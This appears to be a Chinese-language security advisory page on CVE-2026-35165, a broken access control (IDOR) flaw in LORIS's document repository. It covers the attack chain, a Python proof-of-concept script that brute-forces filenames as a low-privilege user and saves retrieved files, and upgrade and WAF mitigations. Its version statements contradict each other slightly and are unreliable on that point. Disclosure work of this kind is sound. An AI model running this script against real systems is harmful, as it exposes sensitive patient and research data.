CVE-2026-35165 CVSS 6.3 中危

CVE-2026-35165 LORIS访问控制漏洞致文件泄露

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35165

漏洞类型

访问控制失效 / IDOR

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

LORIS

漏洞概述

LORIS在21.0.0至27.0.3及28.0.1版本中存在安全漏洞。虽然前端限制了文件访问，但后端端点未正确验证权限。攻击者若知道或暴力破解文件名，可下载无权访问的文件。该漏洞已在27.0.3和28.0.1版本中修复。

技术细节

该漏洞属于不安全的直接对象引用（IDOR）。在受影响的LORIS版本中，document_repository模块的前端界面实施了UI层面的访问限制，但处理文件下载请求的后端API端点缺乏对应的权限校验逻辑。当攻击者发送针对特定文件的下载请求时，后端仅检查文件是否存在，未验证当前用户是否具备该文件的访问权限。攻击者可通过枚举、猜测或暴力破解文件名的方式，绕过前端限制，直接向后端发送HTTP请求获取敏感数据。

攻击链分析

STEP 1

1. 信息收集

攻击者获取目标LORIS系统的访问权限，注册或使用一个低权限账户。

STEP 2

2. 枚举文件名

攻击者根据系统命名规则或通用字典生成潜在的目标文件名列表。

STEP 3

3. 发起请求

攻击者绕过前端界面，直接向后端API端点发送包含猜测文件名的下载请求。

STEP 4

4. 数据获取

后端验证文件存在但未校验权限，返回文件内容，攻击者成功下载敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
target_url = "https://example.com/document_repository/download"
login_url = "https://example.com/login"
username = "low_priv_user"
password = "password"

# Common filenames to brute force (examples)
wordlist = ["patient_data.csv", "config.php", "admin_notes.pdf", "results_2026.docx"]

def exploit():
    session = requests.Session()
    
    # Step 1: Authenticate as a low-privilege user
    login_data = {"username": username, "password": password}
    session.post(login_url, data=login_data)
    
    print(f"[*] Logged in as {username}")
    
    # Step 2: Brute force filenames
    for filename in wordlist:
        # Parameter name may vary (e.g., 'file', 'filename', 'id')
        params = {"file": filename} 
        
        response = session.get(target_url, params=params)
        
        # Check if download was successful (HTTP 200 and valid content)
        if response.status_code == 200 and "Content-Disposition" in response.headers:
            print(f"[+] SUCCESS! Downloaded: {filename}")
            # Save file
            with open(f"downloaded_{filename}", "wb") as f:
                f.write(response.content)
        else:
            print(f"[-] Failed to access: {filename}")

if __name__ == "__main__":
    exploit()

影响范围

21.0.0 至 27.0.3 之前版本

28.0.1 之前版本

防御指南

临时缓解措施

建议立即升级到修复版本。如果无法立即升级，应在Web应用防火墙（WAF）层面实施严格的访问控制策略，限制对document_repository端点的异常请求频率，并监控大量的文件下载尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表